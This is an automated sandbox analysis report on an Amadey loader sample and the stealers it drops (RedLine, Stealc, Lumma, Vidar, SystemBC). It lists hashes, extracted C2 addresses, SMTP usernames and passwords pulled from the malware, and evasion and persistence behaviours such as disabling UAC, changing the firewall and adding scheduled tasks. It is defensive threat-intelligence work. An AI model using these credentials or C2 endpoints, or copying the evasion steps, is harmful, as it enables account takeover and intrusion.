amadey | 1ae67ddf4ff145a2d38af88aef5c014e8f31bed46c9900d2a620c746de44fa2a

Analysis

max time kernel
95s
max time network
289s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
07-05-2024 22:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1ae67ddf4ff145a2d38af88aef5c014e8f31bed46c9900d2a620c746de44fa2a.exe
Size

1.8MB
MD5

85b8713f5c07617adba5767c31e044af
SHA1

93379f92764c08434bf7a3b3d5e4fd6cc737a52e
SHA256

1ae67ddf4ff145a2d38af88aef5c014e8f31bed46c9900d2a620c746de44fa2a
SHA512

a07246ade6c46abcb6680dab9fc3d7cb9d0d97b5255d40b3614bfa521f6ef566cfe5e4a7f839f41fb80054e278ce3ca6422035f6774c8f4dfcd926b352ae476d
SSDEEP

49152:KZpj6zsGM51J2GHKbZc0swjSKzeBJHmsFdf2FLwUQP46G:KLj6zsGGdqtzIdFd27QP9G

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
smtp.netzero.com
Port:
587
Username:
[email protected]
Password:
Sammie

Extracted

Credentials

Protocol: smtp
Host:
mx.hotil.it
Port:
587
Username:
[email protected]
Password:
sniper2

Extracted

Credentials

Protocol: smtp
Host:
smtp.ac.em-net.ne.jp
Port:
587
Username:
[email protected]
Password:
mackymax

Extracted

Credentials

Protocol: smtp
Host:
smtp.ar.em-net.ne.jp
Port:
587
Username:
[email protected]
Password:
sato1123

Extracted

Credentials

Protocol: smtp
Host:
smtp.ar.em-net.ne.jp
Port:
587
Username:
[email protected]
Password:
tomoko23

Extracted

Credentials

Protocol: smtp
Host:
smtp.ar.em-net.ne.jp
Port:
587
Username:
[email protected]
Password:
juju9367

Extracted

Credentials

Protocol: smtp
Host:
smtp.am.em-net.ne.jp
Port:
587
Username:
[email protected]

Extracted

Credentials

Protocol: smtp
Host:
smtp.am.em-net.ne.jp
Port:
587
Username:
[email protected]

Extracted

Credentials

Protocol: smtp
Host:
smtp.netzero.com
Port:
587
Username:
[email protected]

Extracted

Family

amadey

Version

4.18

http://193.233.132.56

Attributes

install_dir
09fd851a4f
install_file
explorha.exe
strings_key
443351145ece4966ded809641c77cfa8
url_paths
/Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

redline

Botnet

Test1234

185.215.113.67:26260

Extracted

Family

stealc

http://49.13.229.86

Attributes

url_path
/c73eed764cc59dcb.php

Extracted

Family

amadey

Version

4.18

http://193.233.132.56

Attributes

strings_key
443351145ece4966ded809641c77cfa8
url_paths
/Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

185.172.128.33:8970

Extracted

Family

redline

Botnet

newpub

185.215.113.67:26260

Extracted

Family

systembc

67.211.218.147:4001

Extracted

Family

lumma

https://affordcharmcropwo.shop/api

https://cleartotalfisherwo.shop/api

https://worryfillvolcawoi.shop/api

https://enthusiasimtitleow.shop/api

https://dismissalcylinderhostw.shop/api

https://diskretainvigorousiw.shop/api

https://communicationgenerwo.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral2/memory/5440-680-0x00000000044E0000-0x0000000004726000-memory.dmp	family_vidar_v7
behavioral2/memory/5440-681-0x00000000044E0000-0x0000000004726000-memory.dmp	family_vidar_v7

Detect ZGRat V1 4 IoCs

resource	yara_rule
behavioral2/memory/4168-358-0x0000000000400000-0x0000000000592000-memory.dmp	family_zgrat_v1
behavioral2/files/0x000700000001ac35-385.dat	family_zgrat_v1
behavioral2/memory/4720-386-0x00000000007B0000-0x0000000000870000-memory.dmp	family_zgrat_v1
behavioral2/files/0x000700000001ac35-364.dat	family_zgrat_v1

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	MzVTKXYCpztKoJlD05525DLd.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 8 IoCs

resource	yara_rule
behavioral2/files/0x000800000001abce-41.dat	family_redline
behavioral2/memory/1600-49-0x0000000000910000-0x0000000000962000-memory.dmp	family_redline
behavioral2/files/0x000700000001ac34-366.dat	family_redline
behavioral2/memory/5032-368-0x0000000000C30000-0x0000000000C82000-memory.dmp	family_redline
behavioral2/files/0x000700000001ac35-385.dat	family_redline
behavioral2/memory/4720-386-0x00000000007B0000-0x0000000000870000-memory.dmp	family_redline
behavioral2/files/0x000700000001ac35-364.dat	family_redline
behavioral2/memory/5624-523-0x00000000008F0000-0x0000000000942000-memory.dmp	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc
SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1ae67ddf4ff145a2d38af88aef5c014e8f31bed46c9900d2a620c746de44fa2a.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	MzVTKXYCpztKoJlD05525DLd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
90	4828	rundll32.exe
90	4828	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 36 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1912	powershell.exe
6072	powershell.exe
4912	powershell.exe
872	powershell.exe
3744	powershell.exe
5208	powershell.exe
5520	powershell.exe
4560	powershell.exe
4720	powershell.exe
4152	powershell.exe
4544	powershell.exe
4124	powershell.exe
5036	powershell.exe
2124	powershell.exe
2640	powershell.exe
3224	powershell.exe
4596	powershell.exe
1984	powershell.exe
1072	powershell.exe
5648	powershell.exe
5140	powershell.exe
5960	powershell.exe
5596	powershell.exe
5056	powershell.exe
2952	powershell.exe
5920	powershell.exe
3468	powershell.exe
5520	powershell.exe
4432	powershell.exe
764	powershell.exe
2368	powershell.exe
4664	powershell.exe
5264	powershell.EXE
4188	powershell.exe
2516	powershell.exe
2660	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 5 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5368	netsh.exe
1708	netsh.exe
5788	netsh.exe
4240	netsh.exe
4724	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1ae67ddf4ff145a2d38af88aef5c014e8f31bed46c9900d2a620c746de44fa2a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1ae67ddf4ff145a2d38af88aef5c014e8f31bed46c9900d2a620c746de44fa2a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MzVTKXYCpztKoJlD05525DLd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MzVTKXYCpztKoJlD05525DLd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Drops startup file 9 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XxAn9jdDHr6sGkbNoLBOnEKs.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mbWcFQdp8y5wIA1xZyOVA8SJ.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Akm616GIINYsyQ6SN7cJhpGj.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uXqQNHrqkCt4QqTw4b29ckcL.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XbxBx2G4Oq9LZ4zqqsXVXI7G.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gD2Iyl89dJY91coy3hi4785i.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l1hKW0XR9m6dNX4EIR2cRh08.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TgmVi2oGHYA0BuyqGdpCUEEb.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1lLYILgIn142yy9cmdscB2gg.bat	installutil.exe

Executes dropped EXE 64 IoCs

pid	Process
2232	explorha.exe
4864	swiiiii.exe
1600	jok.exe
4028	swiy.exe
2440	file300un.exe
1948	IaSwrijVzwI1mgij1L83Pdbd.exe
3128	gold.exe
3632	zZuojHAQUQ5Cp4NWx0lcwiaI.exe
1288	uvoHFhD38aBdr7RSzVq32lma.exe
1412	JOUzGzESAhwWCPNEcQc81dnS.exe
4164	explorha.exe
2708	OJ0wvXxf6lnkhWHVWHCkhHCb.exe
2668	MzVTKXYCpztKoJlD05525DLd.exe
1880	alexxxxxxxx.exe
4720	trf.exe
5032	keks.exe
3652	enpl.exe
5440	Lucas.pif
5556	pl.exe
5624	newpub.exe
5848	install.exe
6060	GameService.exe
6092	GameService.exe
6108	GameService.exe
6128	GameService.exe
4548	GameService.exe
5128	GameSyncLink.exe
3956	GameService.exe
5048	GameService.exe
2680	GameService.exe
5140	GameService.exe
5180	GameService.exe
5204	PiercingNetLink.exe
5332	GameService.exe
5420	GameService.exe
5424	GameService.exe
5396	GameService.exe
2704	GameSyncLinks.exe
4116	NewB.exe
5536	ISetup8.exe
5776	toolspub1.exe
1792	4767d2e713f2021e8fe856e3ea638b58.exe
1984	jgyesfersg.exe
3428	work.exe
4508	ogkdraw.exe
4260	GameSyncLink.exe
5320	PiercingNetLink.exe
5344	GameSyncLinks.exe
5424	GameSyncLink.exe
5868	PiercingNetLink.exe
5968	GameSyncLinks.exe
2380	8K2738cvPlsbBxGQp9FoZE5M.exe
5284	Install.exe
2384	uaPPbtFaQvKdv3MMiftmiDPe.exe
5612	Install.exe
2696	moqpq.exe
5408	GameSyncLink.exe
4500	PiercingNetLink.exe
5784	GameSyncLinks.exe
5608	Install.exe
1440	explorha.exe
5364	Install.exe
1084	NewB.exe
1628	GameSyncLinks.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine	1ae67ddf4ff145a2d38af88aef5c014e8f31bed46c9900d2a620c746de44fa2a.exe

Loads dropped DLL 5 IoCs

pid	Process
5084	rundll32.exe
3428	rundll32.exe
4828	rundll32.exe
5040	RegAsm.exe
5040	RegAsm.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/memory/2668-329-0x0000000140000000-0x0000000140917000-memory.dmp	themida
behavioral2/files/0x000700000001ac2d-312.dat	themida
behavioral2/files/0x000700000001ac2d-311.dat	themida
behavioral2/memory/2668-412-0x0000000140000000-0x0000000140917000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MzVTKXYCpztKoJlD05525DLd.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	Install.exe

Drops file in System32 directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	MzVTKXYCpztKoJlD05525DLd.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	MzVTKXYCpztKoJlD05525DLd.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy	MzVTKXYCpztKoJlD05525DLd.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	MzVTKXYCpztKoJlD05525DLd.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs

pid	Process
2824	1ae67ddf4ff145a2d38af88aef5c014e8f31bed46c9900d2a620c746de44fa2a.exe
2232	explorha.exe
4164	explorha.exe
2668	MzVTKXYCpztKoJlD05525DLd.exe
4508	ogkdraw.exe
4508	ogkdraw.exe
2696	moqpq.exe
2696	moqpq.exe
4508	ogkdraw.exe
1440	explorha.exe
2696	moqpq.exe
4508	ogkdraw.exe
2696	moqpq.exe
4508	ogkdraw.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 4864 set thread context of 700	4864	swiiiii.exe	77
PID 4028 set thread context of 5040	4028	swiy.exe	85
PID 2440 set thread context of 4552	2440	file300un.exe	89
PID 3128 set thread context of 4760	3128	gold.exe	96
PID 1880 set thread context of 4168	1880	alexxxxxxxx.exe	113

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe
File opened for modification	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe
File created	C:\Windows\Tasks\XyyyteIMwZeutaZuw.job	schtasks.exe
File created	C:\Windows\Tasks\explorha.job	1ae67ddf4ff145a2d38af88aef5c014e8f31bed46c9900d2a620c746de44fa2a.exe
File created	C:\Windows\Tasks\moqpq.job	ogkdraw.exe
File opened for modification	C:\Windows\Tasks\moqpq.job	ogkdraw.exe

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5052	sc.exe
752	sc.exe
6080	sc.exe
6044	sc.exe
784	sc.exe
5316	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
820	4864	WerFault.exe
3724	1880	WerFault.exe	112
4224	5440	WerFault.exe	131

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe

Creates scheduled task(s) 1 TTPs 21 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5900	schtasks.exe
5348	schtasks.exe
3392	schtasks.exe
5048	schtasks.exe
5880	schtasks.exe
4412	schtasks.exe
5724	schtasks.exe
4596	schtasks.exe
4412	schtasks.exe
2328	schtasks.exe
4700	schtasks.exe
5948	schtasks.exe
6096	schtasks.exe
4244	schtasks.exe
1968	schtasks.exe
5168	schtasks.exe
3684	schtasks.exe
4596	schtasks.exe
5908	schtasks.exe
6100	schtasks.exe
5052	schtasks.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
5188	tasklist.exe
5232	tasklist.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{38ff9706-0000-0000-0000-d01200000000}\MaxCapacity = "14116"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	HGRrgVR.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	HGRrgVR.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	HGRrgVR.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
